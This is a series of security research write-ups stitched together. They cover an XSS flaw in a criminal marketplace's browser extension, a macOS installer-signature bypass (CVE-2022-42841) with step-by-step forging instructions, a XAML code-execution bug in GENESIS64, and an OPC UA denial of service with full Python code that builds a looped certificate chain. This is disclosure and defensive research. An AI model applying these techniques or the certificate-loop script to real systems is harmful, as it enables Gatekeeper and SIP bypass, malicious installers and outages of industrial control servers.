The extension contains functionality (and has the permission) to configure a SOCKS5 proxy. In the victim's extension, a method for proxying HTTPS requests through the victim's browser was found that uses WebSockets. The functionality to send requests over such a WebSocket connection was not found in the buyer's extension, although due to the obfuscation this is not fully certain. It is still an open question whether proxying through the victim's machine directly was a feature offered by the market, or whether the buyers only used their own SOCKS5 proxies.
Fingerprinting buyers
The extension registers an event handler on all webpages. The content script that gets added to each visited webpage by the extension registers an event handler for a custom event named hammilton. This appears to be a method for communicating with the extension from a webpage, as it will pass the result back to the page. When this event is received by the content script, it sends a message to the background script, which will send a response back as JavaScript code which is evaluated in the content script:
Therefore, by setting window.bunny.cb[0] to a JavaScript function and sending the event, it is possible to determine if a user has this extension installed by determining if that function is called.
The reason why this is present is not entirely clear to us. However, it does provide us with a nice way of fingerprinting the buyers' extension.
Taking it one step further...
Fingerprinting buyers is already cool of course, but maybe we can take it one step further? For example by exploiting an XSS vulnerability in the extension itself? There is a vulnerability in the method used to communicate back to the webpage. The parameter l in the custom event detail object is used in the response code that is evaluated. This value is used as-is and not escaped before calling eval. By including a single quote character ('), it is possible to inject additional JavaScript code that gets executed in the context of the content script.
For example, the following event, sent from the webpage:
Therefore, the console.log(1) is executed by the content script, instead of the page.
Browser extensions use an (invisible) background page which can use all the permissions granted to that extension. This background page does not directly have access to the contents of the visited webpages, but it can inject new JavaScript to run on those pages, called "content scripts". Content scripts have access to a specific page and can interact with that page's DOM, but use a JavaScript environment that is separate from the page's own JavaScript environment. Content scripts do not have all the permissions of the background page, but they do have permission to send messages to the background page and can access the storage of the extension, making them more powerful than the page's own JavaScript.
Therefore, one of the things that can be done by sending messages to the background page is copying the configuration of the plugin. For example:
We have actually included a script in this page which will exploit this precise vulnerability (if you have this extension installed). It first turned off the proxy functionality, and then uploaded your extension configuration to us.
Conclusions
We would like to thank all law enforcement agencies that collaborated on this case to take this marketplace down. We're glad we could be of assistance. All findings have been shared with authorities and all malicious files have been reported to the relevant organisations. Hopefully this post can help any future researchers, if this marketplace ever comes back online.
If you have any followup questions, feel free to reach out.
For reference, these are the files that we investigated (the buyers side is purposely excluded from this list):
Code signing of applications is an essential element of macOS security. Besides signing applications, it is also possible to sign installer packages (.pkg files). During a short review of the xar source code, we found a vulnerability (CVE-2022-42841) that could be used to modify a signed installer package without invalidating its signature. This vulnerability could be abused to bypass Gatekeeper, SIP and under certain conditions elevate privileges to root.
Background
Installer packages are based on xar files with a number of predefined file names. The method for signing installer packages is the same as generating signed xar files, so to start we'll explain how that file format works.
A xar file consists of 3 parts: a fixed length header, a table of contents (TOC) and what is called the "heap".
The header contains a number of fields, including the hashing algorithm that is used throughout the file (typically still SHA1) and the size of the TOC.
The TOC is a zlib-compressed XML document. This document lists for each file included in the archive the start address and length where the contents can be found on the heap, starting with 0 for the first byte directly after the TOC. Each file in the archive can be compressed independently by specifying an encoding, so when creating an archive file it is possible to choose the optimal way of storing each file.
For all files, a hash is included in the TOC of both the uncompressed and compressed data, using the hashing algorithm specified in the header.
Even xar files that are not signed have these hashes and so the integrity can be verified when extracting a file.
To verify the integrity of the entire archive, the TOC also lists the location on the heap where a value known as the "TOC hash" is stored. In practice this is usually at offset 0:
The value stored here must be equal to the hash of the compressed TOC data and this is verified when the archive is opened. The reason this is included on the heap and not in the TOC itself is that this would create a cyclic dependency: adding this value into the TOC would change the TOC and the TOC hash again.
This hash indirectly guarantees the integrity of all files in the archive: for each file, the extracted-checksum in the TOC ensures the integrity of that file. The integrity of the TOC is covered by the TOC hash. This construction has the nice benefit that a single file can be extracted and validated without having to validate the entire archive. This means it is possible to extract files from xar archives without completely reading the archive, or possibly even without completely downloading it.
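The layout described above can be sketched in a few lines of Python. This is a minimal illustration, not the libxar implementation: it assumes the 28-byte big-endian xar header (magic, header size, version, compressed and uncompressed TOC length, checksum algorithm), builds a tiny demo archive in memory and then checks the TOC hash the same way an archive would be checked when opened. The helper names `build_demo_xar` and `verify_toc_hash` are made up for this example, and only SHA-1 is handled.

```python
import hashlib
import struct
import xml.etree.ElementTree as ET
import zlib

# magic, header size, version, compressed TOC length, uncompressed TOC length, checksum algorithm
XAR_HEADER = struct.Struct(">IHHQQI")
XAR_MAGIC = 0x78617221  # the bytes "xar!"
CKSUM_SHA1 = 1


def build_demo_xar() -> bytes:
    """Build a minimal, file-less archive: header + compressed TOC + heap."""
    toc_xml = (
        b'<?xml version="1.0" encoding="UTF-8"?>'
        b'<xar><toc><checksum style="sha1">'
        b"<offset>0</offset><size>20</size>"
        b"</checksum></toc></xar>"
    )
    toc = zlib.compress(toc_xml)
    header = XAR_HEADER.pack(XAR_MAGIC, XAR_HEADER.size, 1, len(toc), len(toc_xml), CKSUM_SHA1)
    heap = hashlib.sha1(toc).digest()  # the TOC hash, stored at heap offset 0
    return header + toc + heap


def verify_toc_hash(data: bytes) -> bool:
    """Compare the hash of the compressed TOC with the value stored on the heap."""
    magic, header_size, _version, toc_len, _toc_ulen, _alg = XAR_HEADER.unpack_from(data)
    if magic != XAR_MAGIC:
        raise ValueError("not a xar file")
    toc = data[header_size:header_size + toc_len]
    checksum = ET.fromstring(zlib.decompress(toc)).find("toc/checksum")
    offset = int(checksum.findtext("offset"))
    size = int(checksum.findtext("size"))
    heap_start = header_size + toc_len  # heap offset 0 is the first byte after the TOC
    stored = data[heap_start + offset:heap_start + offset + size]
    return stored == hashlib.sha1(toc).digest()


archive = build_demo_xar()
tampered = archive[:-1] + bytes([archive[-1] ^ 1])  # flip one bit of the stored hash
print(verify_toc_hash(archive), verify_toc_hash(tampered))
```

Note that the hash is taken over the compressed TOC bytes, which is why the check can run before the XML is trusted for anything else.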
Signed xar files additionally contain a signature element with a certificate chain in the TOC:
The signature itself is also stored on the heap (for the same cyclic dependency reason). The data used for generating the signature is the TOC hash. This signature therefore ensures the authenticity of all files in the archive.
Interestingly, this design does mean that data on the heap that is not included in any of the ranges can be modified without invalidating the signature. For example, appending more data to a xar file will always keep the TOC hash and signature valid.
The vulnerability
For signed packages, the TOC hash needs to be used for two different checks:
The computed TOC hash needs to be equal to the TOC hash stored on the heap.
The signature and the certificates need to correspond to the TOC hash.
This is implemented in the following locations in the xar source code.
Here, the computed TOC hash is compared to the value stored on the heap.
/* if TOC specifies a location for the checksum, make sure that
 * we read the checksum from there: this is required for an archive
 * with a signature, because the signature will be checked against
 * the checksum at the specified location <rdar://problem/7041949>
 */
const char *value;
uint64_t offset = 0;
uint64_t length = 0;
if( xar_prop_get( XAR_FILE(ret) , "checksum/offset", &value) == 0 ) {
    if( value ) {
        errno = 0;
        offset = strtoull( value, (char **)NULL, 10);
        if( errno != 0 ) {
            fprintf(stderr, "checksum/offset missing or invalid!\n");
            xar_close(ret);
            return NULL;
        }
    } else {
        fprintf(stderr, "checksum/offset missing or invalid!\n");
        xar_close(ret);
        return NULL;
    }
}

[...]

XAR(ret)->heap_offset = xar_get_heap_offset(ret) + offset;
if( lseek(XAR(ret)->fd, XAR(ret)->heap_offset, SEEK_SET) == -1 ) {
    xar_close(ret);
    return NULL;
}

[...]

size_t tlen = 0;
void *toccksum = xar_hash_finish(XAR(ret)->toc_hash_ctx, &tlen);
XAR(ret)->toc_hash_ctx = NULL;

if( length != tlen ) {
    free(toccksum);
    xar_close(ret);
    return NULL;
}

// Store our toc hash upon archive open, so callers can determine if it
// has changed or been tampered with after archive open
XAR(ret)->toc_hash = malloc(tlen);
memcpy(XAR(ret)->toc_hash, toccksum, tlen);
XAR(ret)->toc_hash_size = tlen;

void *cval = calloc(1, tlen);
if( !cval ) {
    free(toccksum);
    xar_close(ret);
    return NULL;
}

ssize_t r = xar_read_fd(XAR(ret)->fd, cval, tlen);

[...]

if( memcmp(cval, toccksum, tlen) != 0 ) {
    fprintf(stderr, "Checksums do not match!\n");
    free(toccksum);
    free(cval);
    xar_close(ret);
    return NULL;
}
This first retrieves the checksum/offset value from the XML document as a const char *value. Then, strtoull converts it to an unsigned 64-bit integer and it gets stored in the offset variable. The code that obtains the TOC hash for the signature verification reads the same value:
uint32_t offset = 0;
xar_t x = NULL;
const char *value;

// xar 1.6 fails this method if any of data, length, signed_data, signed_length are NULL
// within OS X we use this method to get combinations of signature, signed data, or signed_offset,
// so this method checks and sets these out values independently

if( !sig )
    return -1;

x = XAR_SIGNATURE(sig)->x;

/* Get the checksum, to be used for signing.  If we support multiple checksums
   in the future, all checksums should be retrieved */
if( length ) {
    if( 0 == xar_prop_get_expect_notnull( XAR_FILE(x) , "checksum/size", &value) ) {
        *length = strtoull( value, (char **)NULL, 10);
    }

    if( 0 == xar_prop_get_expect_notnull( XAR_FILE(x) , "checksum/offset", &value) ) {
        offset = strtoull( value, (char **)NULL, 10);
    }

    if( data ) {
        *data = malloc(sizeof(char)*(*length));

        // This function will either read all of length or return -1. Check and bubble up.
        if( _xar_signature_read_from_heap(x, offset, *length, *data) != 0 )
            return -1;
    }
}
Note here the tiny but very important difference: while the first comparison was storing the offset in uint64_t offset (a 64-bit unsigned integer), here it uses a uint32_t offset (a 32-bit unsigned integer). This difference means that if the offset is outside of the range that can be stored in a 32-bit value, the two checks can use a different heap offset. For example, if the offset is equal to 0x1 0000 0000, then the integrity hash will be read from 0x1 0000 0000, while the signature hash will be read from offset 0x0 on the heap.
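The truncation can be reproduced with plain integer arithmetic. The snippet below is only a model of the two C assignments (Python integers do not overflow, so the masks stand in for the width of each variable); the function names are made up for this illustration, and the model only holds for values that fit in 64 bits.

```python
UINT32_MASK = 0xFFFFFFFF
UINT64_MASK = 0xFFFFFFFFFFFFFFFF


def as_uint64(value: str) -> int:
    """Model of storing the parsed value in a uint64_t."""
    return int(value, 10) & UINT64_MASK


def as_uint32(value: str) -> int:
    """Model of storing the same value in a uint32_t: the upper 32 bits are dropped."""
    return int(value, 10) & UINT32_MASK


toc_value = "4294967296"  # 0x1_0000_0000, one more than the largest 32-bit value
integrity_offset = as_uint64(toc_value)
signature_offset = as_uint32(toc_value)
print(hex(integrity_offset), hex(signature_offset))  # prints: 0x100000000 0x0
```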
Thus, it was possible to modify a xar file without invalidating its signature as follows:
Take a correctly signed xar file and parse the TOC.
Change the checksum offset value to 4294967296 (and make any other changes you want to the included files, like adding a malicious preinstall script or replacing the installation check script).
Write the modified TOC back to the file and compute the new TOC hash.
Add padding until the heap is exactly 4294967296 bytes (4 GiB) in size.
Place the new TOC hash at heap offset 4294967296, leaving the original TOC hash at heap offset 0.
When this package is verified, the integrity check will use the hash at offset 4294967296, while the signature verification will read it from offset 0. The integrity check will pass, because the new TOC hash is placed there, while the signature will also pass, because the signatures still correspond to the old TOC hash.
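The steps above can be simulated without creating a 4 GiB file. The following sketch models the heap as a sparse mapping from offset to bytes and re-implements the two checks in simplified form; `SparseHeap`, `integrity_check` and `hash_used_for_signature` are hypothetical names for this example, and the "signature" is reduced to the hash it covers rather than a real certificate check.

```python
import hashlib

HASH_LEN = 20  # SHA-1


class SparseHeap:
    """Heap modelled as {offset: bytes}, so the padding never has to exist."""

    def __init__(self):
        self.chunks = {}

    def write(self, offset: int, data: bytes) -> None:
        self.chunks[offset] = data

    def read(self, offset: int, length: int) -> bytes:
        return self.chunks.get(offset, b"\0" * length)[:length]


def integrity_check(heap: SparseHeap, toc: bytes, offset_text: str) -> bool:
    offset = int(offset_text) & 0xFFFFFFFFFFFFFFFF  # uint64_t offset
    return heap.read(offset, HASH_LEN) == hashlib.sha1(toc).digest()


def hash_used_for_signature(heap: SparseHeap, offset_text: str) -> bytes:
    offset = int(offset_text) & 0xFFFFFFFF  # uint32_t offset, as in the vulnerable code
    return heap.read(offset, HASH_LEN)


original_toc = b"<toc>original, signed by the vendor</toc>"
modified_toc = b"<toc>modified by the attacker</toc>"
signed_hash = hashlib.sha1(original_toc).digest()  # what the existing signature covers

heap = SparseHeap()
heap.write(0, signed_hash)                                   # original TOC hash stays at offset 0
heap.write(4294967296, hashlib.sha1(modified_toc).digest())  # new TOC hash at 4 GiB

integrity_ok = integrity_check(heap, modified_toc, "4294967296")
signature_ok = hash_used_for_signature(heap, "4294967296") == signed_hash
print(integrity_ok, signature_ok)  # prints: True True
```

Both checks succeed even though the TOC that is actually used differs from the TOC that was signed.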
Exploitation
This was quite an interesting bug that could be applied in a number of different ways, with different requirements and impact.
Bypassing SIP's filesystem restrictions
When a package is installed that is signed by Apple, installation works a little differently compared to an installation of a package signed by anyone else. These installations are performed by system_installd, instead of installd, which has an entitlement granting it access to all files normally protected by SIP:
This makes sense, as updates from Apple often need to write to protected locations, like replacing components of the OS.
Abusing this vulnerability to modify a package signed by Apple would make it possible to read and write to all those SIP protected files. This could be used to, for example:
Grant an application TCC permissions, like access to the webcam, microphone, etc.
Read data from a data vault, such as the user's Mail and Safari data.
Load a kernel extension without user approval on Intel macs (although the kernel extension would need to be properly signed).
This could be used to modify a package that a user installs manually, although that requires convincing the user. Another option would be a process that has already obtained root privileges using this to gain access to SIP protected locations, as the root user is allowed to use the install command to perform the installation of new packages.
Note that any files on the Signed System Volume (SSV) could not be modified this way, as that disk is mounted read-only.
Bypassing Gatekeeper
After downloading a .pkg file, Gatekeeper will perform a notarization check, similar to that for applications. It takes the hash of the package and submits it to Apple to check that it has been scanned for malware. When a user opens a package that was not notarized, they receive a scary warning, making it quite difficult to trick a user into installing a package containing malware.
The method for querying Apple's server for the notarization status of a package uses the same function to obtain the TOC hash as was used for the signature verification. Therefore, a modified package will still be considered notarized if the original was. This means that if a user downloads such a modified package file, they will not be warned in any way.
Asking users to download a 4 GiB .pkg sounds like a challenge. Even if users don't notice the unusual size, the fact that they need to wait a few minutes for the download to finish could allow them to spot that something is off about the webpage offering the download. Luckily, the padding in the package can be anything, so when using the same byte for all the padding, the resulting file compresses very well. By placing the package on a compressed disk image, the resulting .dmg file can be only a few hundred kilobytes. Distributing an application in this way is also not unusual for macOS. The increase in size also does not increase the time required to verify the package: as mentioned, only the integrity of data on the heap that is actually in use is checked.
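How well single-byte padding compresses is easy to check. The snippet below uses zlib as a stand-in (an assumption: compressed disk images use their own compression formats, so the exact numbers will differ) and a 16 MiB buffer instead of 4 GiB to keep it quick to run.

```python
import zlib

padding = bytes(16 * 1024 * 1024)  # 16 MiB of zero bytes
compressed = zlib.compress(padding, 9)

ratio = len(padding) / len(compressed)
print(f"{len(padding)} bytes -> {len(compressed)} bytes (about {ratio:.0f}:1)")
```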
Combining this with the previous vulnerability would allow for some very powerful malware: it would be possible to create a manipulated installer package that appears completely legitimate and triggers no warnings when installed. After the user installs it, the malware immediately gains complete access to all SIP-protected data on the system.
Elevating privileges
We did not find a way to abuse this vulnerability for privilege escalation on an out-of-the-box installation of macOS. However, when combined with certain third-party software, we did find a method.
Some applications try to make sure that their application can update itself automatically, even if the current user is not an admin user. Normally, non-admin users are not allowed to make changes in /Applications, so they can not update any existing applications. If the admin never logs in, this could mean that users run known vulnerable software indefinitely.
To solve that, some applications include a privileged helper tool to perform the upgrade. This is a tool that runs as root and has the single purpose of installing updates for the existing application. Often, the application itself handles the checking for updates and downloading a new update file, the tool only performs the actual installation.
To make this secure, there are two important checks:
A request to install an update must originate from the associated application.
The update file must be authentic (and not a downgrade).
The format of the update file varies between the applications that implement this, but using .pkg files is common. If this method is used, then it may be possible to swap out an update package with a modified version. For example, by using a race condition to change the package in between the download by the application and the actual installation by the privileged helper tool. This means that the package would be installed automatically, allowing privilege escalation to root.
In fact, this vulnerability was originally discovered when investigating the privileged helper tool used by Zoom. In the DEF CON 30 talk "You're Muted Rooted", Patrick Wardle described a method for bypassing the signature verification performed by Zoom. This was addressed by switching to the libxar functions for verifying a package signature.
Non-impact
During our research to investigate the full impact of this vulnerability, we also attempted to modify macOS system updates. These also use .pkg files and verify the TOC hash, however, they compare it to the computed TOC hash. Therefore, replacing a system update with a malicious file is not possible.
This issue also does not affect iOS, as xar files are not used there anywhere as far as we could tell. While signed xar files have been used for Safari extensions in the past, they now use app extensions, so we could also not identify any impact there.
Demo
The following video demonstrates the use of this vulnerability to bypass Gatekeeper and SIP. As can be seen, it creates a new file in /private/var/db/SystemPolicyConfiguration/, a directory normally protected by SIP.
(Note that the installer states that the installation has failed, but the exploit already ran using a pre-install script. This is only the case for the demo and could be avoided for a real attack.)
The fix
This was fixed by Apple with a 2 character fix: changing uint32_t to uint64_t in macOS 13.1.
What is interesting about this vulnerability is that there was a similar issue in 2010: CVE-2010-0055. In that version, one of the checks assumed that the TOC hash offset was always 0 and the other used the value read from the TOC. Vulnerabilities that are variants of fixed issues and regressions that re-introduce a vulnerability are sadly common, but to see a vulnerability similar to a 12 year old vulnerability is still surprising. Especially considering that a small change to this library could prevent all similar vulnerabilities that lead to the same result.
A comment in the code snippet above notes the following:
Store our toc hash upon archive open, so callers can determine if it has changed or been tampered with after archive open
Using this stored value instead of reading it from the file again would have made this vulnerability, and any similar variants, impossible to exploit as the value would not be read from the heap twice.
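As a rough illustration of that idea (a sketch of the design only, not Apple's actual fix, which changed the variable type), the hash can be read and verified once when the archive is opened and then handed to every later consumer. The `Archive` class and its methods are hypothetical.

```python
import hashlib


class Archive:
    """Verifies the TOC hash once at open time and keeps the verified value."""

    def __init__(self, toc: bytes, heap: bytes, checksum_offset: int):
        computed = hashlib.sha1(toc).digest()
        stored = heap[checksum_offset:checksum_offset + len(computed)]
        if stored != computed:
            raise ValueError("Checksums do not match!")
        self.toc_hash = computed  # stored upon archive open

    def signed_data(self) -> bytes:
        # The signature check gets the value verified above. The heap is not
        # read a second time and the offset is not parsed a second time, so
        # the two checks cannot disagree about which hash they are looking at.
        return self.toc_hash


demo_toc = b"<toc>demo</toc>"
demo_archive = Archive(demo_toc, hashlib.sha1(demo_toc).digest(), 0)
print(demo_archive.signed_data().hex())
```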
This write-up is part 5 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in ICONICS GENESIS64 (CVE-2022-33315).
We successfully demonstrated this vulnerability during the competition, however it turned out that the vendor was already aware of this vulnerability. As this was also one of the most shallow bugs we used during the competition, this was something we already anticipated. The bug was originally reported by Zymo Security and disclosed as https://www.zerodayinitiative.com/advisories/ZDI-22-1043/. Luckily, this was the only bug collision we had during this competition.
A 3rd bug collision on Day 1. The team @sector7_nl successfully popped calc, but the bug they used had been disclosed earlier in the competition. They still win $5,000 and 5 Master of Pwn points. #Pwn2Own
GENESIS64 was one of the two targets in the Control Server category. It is more of a software suite than a single application and can be used to design and visualize entire ICS environments. From dashboards and control screens to visualizing entire factory floors in 3D.
Save files
For this category it was acceptable to achieve code execution by opening a file within the target on the contest laptop. The files must be file types that are handled by default by the target application. So we opened up one of the applications that came with the GENESIS64 installer. We chose GraphWorX64 at random (it is normally used to design HMI/SCADA control screens), and saved an empty file. When looking at the empty project file, we can see it is stored as a WPF XAML file:
Using XAML it is possible to directly instantiate objects of arbitrary types. This makes it unsuitable for loading untrusted input files. We quote a small piece of the relevant manual (System.Windows.Markup.XamlReader) from Microsoft regarding the loading of untrusted XAML files:
Code Access Security, Loose XAML, and XamlReader
XAML is a markup language that directly represents object instantiation and execution. Therefore, elements created in XAML have the same ability to interact with system resources (network access, file system IO, for example) as the equivalent generated code does.
…
The implications of these statements for XamlReader is that your application design must make trust decisions about the XAML you decide to load. If you are loading XAML that is not trusted, consider implementing your own sandboxing technique for how you load the resulting object graph.
Unfortunately GENESIS64 has no such sandboxing technique in place, so instantiating arbitrary objects is trivial. The actual decoding of this file seems to happen in Components/IcoWPF.dll, using a wrapper around XamlReader().
Our exploit
In the end we used the following XAML file for instantiating a Process object and providing it the necessary parameters for starting our beloved calculator. This calls the method Start using the parameters cmd.exe /c calc.exe:
You can see the exploit in action in the screen recording below.
Thoughts
To fully mitigate this vulnerability, it would be advised to use a different file format. However, this would also mean that old project files would be unable to load. ICONICS settled for a blocklist approach, with the release of version 10.97.2. In that version, the XAML file is pre-parsed before being passed to XamlReader() and certain classes are excluded from deserialization.
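To give an idea of what such a pre-parsing step might look like, here is a minimal sketch. It is an assumption-heavy illustration: the actual list of excluded classes and the way ICONICS implemented the check are not known to us, the names in `BLOCKED_TYPES` are hypothetical examples, and a blocklist like this is inherently fragile because any dangerous type that is not on the list still gets through.

```python
import xml.etree.ElementTree as ET

# Hypothetical examples of types that should never be instantiated from a project file.
BLOCKED_TYPES = {"Process", "ProcessStartInfo", "ObjectDataProvider"}


def type_name(tag: str) -> str:
    """Strip the XML namespace and any property-element suffix (Type.Property)."""
    local = tag.rsplit("}", 1)[-1]
    return local.split(".", 1)[0]


def find_blocked_types(xaml_text: str) -> list:
    """Return the blocked type names that occur anywhere in the document."""
    root = ET.fromstring(xaml_text)
    return sorted({type_name(el.tag) for el in root.iter()} & BLOCKED_TYPES)


suspicious = """<Canvas xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:diag="clr-namespace:System.Diagnostics;assembly=System">
  <diag:Process />
</Canvas>"""

benign = """<Canvas xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation">
  <Rectangle />
</Canvas>"""

print(find_blocked_types(suspicious), find_blocked_types(benign))
```

A file would only be passed on to the real XAML loader when the returned list is empty.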
We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, we hope to return to a later edition!
This write-up is part 4 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Denial-of-Service in the Unified Automation OPC UA C++ Demo Server (CVE-2022-37013).
Confirmed! The team from @sector7_nl leveraged an infinite loop condition to create a DoS against the Unified Automation C++ Demo Server. They earn $5,000 and 5 points towards Master of Pwn. #Pwn2Own #P2OMiami
OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.
At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different "payload" options:
Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
Remote code execution. Being able to take over the server.
Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.
When a client connects to the server, it first needs to authenticate using a client certificate. We call this the trusted application check. The protocol also supports user authentication, using either a username/password combination or certificates, but this happens only after the client application itself has been authenticated. Although OPC UA uses the same X.509 certificates as TLS, the protocol itself is not based on TLS.
For the OPC UA server category we focused on bypassing the trusted application check, as this would gain us the most points. We did not look at remote code execution vulnerabilities. A trusted application means the application can authenticate with a valid certificate. This meant we only had to audit the certificate verification function, which is a very limited scope. We looked at all applications in scope, and in the end did find such a vulnerability in the OPC Foundation OPC UA .NET Standard (you can find the write-up for this vulnerability here).
In the Unified Automation C++ Demo Server we couldn't find a way to bypass the check, however we did find a reliable Denial-of-Service while reviewing this. Since this Denial-of-Service is in the certificate verification function, it means we can trigger this vulnerability before authentication. In the ICS world where everything revolves around availability, having a vulnerability that allows the attacker to reliably disable a central component is less than ideal.
Certificate verification
Verifying the certificate for a client is handled by the function OpcUa_P_OpenSSL_PKI_ValidateCertificate() in uastack.dll. This function will call OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(), which will check if the certificate or any of its issuers are already explicitly trusted. It will do so by walking the certificate chain and checking each certificate if it is equal to a trusted certificate; meaning its SHA1 hash is equal to that of a file under the pki/trusted/certs folder on the server.
The source code for this function seems to be similar to some code from the OPC Foundation, which can be found on GitHub:
static OpcUa_StatusCode OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(
    OpcUa_P_OpenSSL_CertificateStore* a_pStore,
    X509_STORE_CTX*                   a_pX509Context,
    X509*                             a_pX509Certificate,
    OpcUa_Boolean*                    a_pExplicitlyTrusted)
{
    X509* x = a_pX509Certificate;
    X509* xtmp = OpcUa_Null;
    int iResult = 0;
    OpcUa_UInt32 jj = 0;
    OpcUa_ByteString tBuffer;
    OpcUa_Byte* pPosition = OpcUa_Null;
    OpcUa_P_OpenSSL_CertificateThumbprint tThumbprint;

    OpcUa_InitializeStatus(OpcUa_Module_P_OpenSSL, "CertificateStore_IsExplicitlyTrusted");

    OpcUa_ReturnErrorIfArgumentNull(a_pStore);
    OpcUa_ReturnErrorIfArgumentNull(a_pX509Context);
    OpcUa_ReturnErrorIfArgumentNull(a_pX509Certificate);
    OpcUa_ReturnErrorIfArgumentNull(a_pExplicitlyTrusted);

    OpcUa_P_ByteString_Initialize(&tBuffer);

    *a_pExplicitlyTrusted = OpcUa_False;

    /* follow the trust chain. */
    while (!*a_pExplicitlyTrusted)
    {
        /* need to convert to DER encoded certificate. */
        int iLength = i2d_X509(x, NULL);

        if (iLength > tBuffer.Length)
        {
            tBuffer.Length = iLength;
            tBuffer.Data = OpcUa_P_Memory_ReAlloc(tBuffer.Data, iLength);
            OpcUa_GotoErrorIfAllocFailed(tBuffer.Data);
        }

        pPosition = tBuffer.Data;
        iResult = i2d_X509((X509*)x, &pPosition);

        if (iResult <= 0)
        {
            OpcUa_GotoErrorWithStatus(OpcUa_BadEncodingError);
        }

        /* compute the hash */
        SHA1(tBuffer.Data, iLength, tThumbprint.Data);

        /* check for thumbprint in explicit trust list. */
        for (jj = 0; jj < a_pStore->ExplicitTrustListCount; jj++)
        {
            if (OpcUa_MemCmp(a_pStore->ExplicitTrustList[jj].Data, tThumbprint.Data, SHA_DIGEST_LENGTH) == 0)
            {
                *a_pExplicitlyTrusted = OpcUa_True;
                break;
            }
        }

        if (*a_pExplicitlyTrusted)
        {
            break;
        }

        /* end of chain if self signed. */
        if (X509_STORE_CTX_get_check_issued(a_pX509Context)(a_pX509Context, x, x))
        {
            break;
        }

        /* look in the store for the issuer. */
        iResult = X509_STORE_CTX_get_get_issuer(a_pX509Context)(&xtmp, a_pX509Context, x);

        if (iResult == 0)
        {
            break;
        }

        /* oops - unexpected error */
        if (iResult < 0)
        {
            OpcUa_GotoErrorWithStatus(OpcUa_Bad);
        }

        /* goto next link in chain. */
        x = xtmp;
        X509_free(xtmp);
    }

    OpcUa_P_ByteString_Clear(&tBuffer);

OpcUa_ReturnStatusCode;
OpcUa_BeginErrorHandling;

    OpcUa_P_ByteString_Clear(&tBuffer);

OpcUa_FinishErrorHandling;
}
It will check if the SHA1 hash of the certificate is in the known trusted list. If not, it will continue the while loop, by checking if the issuer (obtained using X509_STORE_CTX_get_get_issuer()) is on the trusted list instead. This will continue until the entire chain has been checked.
However, what if there is a loop in the chain? In that case the while loop will turn into an infinite loop, as there is always some certificate to check. Since the entire network handling occurs in a single thread in the demo application, this will effectively make the server unresponsive for all clients, creating a nice and effective Denial-of-Service. A loop of length one is a self-signed certificate, which is checked for (the call to X509_STORE_CTX_get_check_issued()), but it is in fact also possible to construct a loop of certificates which is longer.
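The problem, and one generic way to guard against it, can be shown with a simplified model of the chain walk. In this sketch certificates are reduced to plain names and the issuer lookup to a dictionary, both of which are simplifications made for this example. Remembering which certificates were already visited is a generic cycle-detection technique; it is not how the vendor fixed the issue.

```python
def is_explicitly_trusted(leaf: str, issuer_of: dict, trusted: set) -> bool:
    """Walk from the leaf towards the root, stopping on a trusted certificate.

    Raises ValueError when the same certificate is reached twice, which is
    exactly the situation in which the original while loop never terminates.
    """
    seen = set()
    current = leaf
    while current is not None:
        if current in trusted:
            return True
        if current in seen:
            raise ValueError("certificate chain contains a loop")
        seen.add(current)
        issuer = issuer_of.get(current)  # None: issuer not found in the store
        if issuer == current:            # self-signed: end of chain
            return False
        current = issuer
    return False


normal_chain = {"client": "intermediate", "intermediate": "root", "root": "root"}
looping_chain = {"A": "B", "B": "A"}

print(is_explicitly_trusted("client", normal_chain, {"root"}))  # prints: True
try:
    is_explicitly_trusted("A", looping_chain, {"root"})
except ValueError as error:
    print("rejected:", error)
```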
Our exploit
Our exploit is simple. First we generate two certificates A and B. Since you only need the private key to sign a certificate, we can sign certificate A with the key of B, and B with the key of A. This creates a certificate chain where both certificates have each other as issuer, and thus a loop.
import datetime

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

backend = default_backend()


def make_cert(name, issuer, public_key, private_key, identifier, issuer_identifier):
    one_day = datetime.timedelta(1, 0, 0)

    builder = x509.CertificateBuilder()
    builder = builder.subject_name(x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, name)
    ]))
    builder = builder.issuer_name(x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, issuer)
    ]))
    builder = builder.not_valid_before(datetime.datetime.today() - (one_day * 7))
    builder = builder.not_valid_after(datetime.datetime.today() + (one_day * 90))
    builder = builder.serial_number(x509.random_serial_number())
    builder = builder.public_key(public_key)

    builder = builder.add_extension(x509.SubjectKeyIdentifier(identifier), critical=False)
    builder = builder.add_extension(
        x509.AuthorityKeyIdentifier(
            key_identifier=issuer_identifier,
            authority_cert_issuer=None,
            authority_cert_serial_number=None,
        ),
        critical=False,
    )
    builder = builder.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=False)

    # No idea if all of these are needed, but data_encipherment is required.
    builder = builder.add_extension(
        x509.KeyUsage(
            digital_signature=True, content_commitment=True, key_encipherment=True,
            data_encipherment=True, key_agreement=True, key_cert_sign=True,
            crl_sign=True, encipher_only=False, decipher_only=False,
        ),
        critical=False,
    )

    # The certificate is actually self-signed, but this doesn't matter because the signature is not checked.
    certificate = builder.sign(private_key=private_key, algorithm=hashes.SHA256(), backend=backend)
    return certificate


private_keyA = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyA = private_keyA.public_key()

private_keyB = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyB = private_keyB.public_key()

# A is issued by B and B is issued by A, which closes the loop.
certA = make_cert("A", "B", public_keyA, private_keyB, b"1", b"2")
certB = make_cert("B", "A", public_keyB, private_keyA, b"2", b"1")
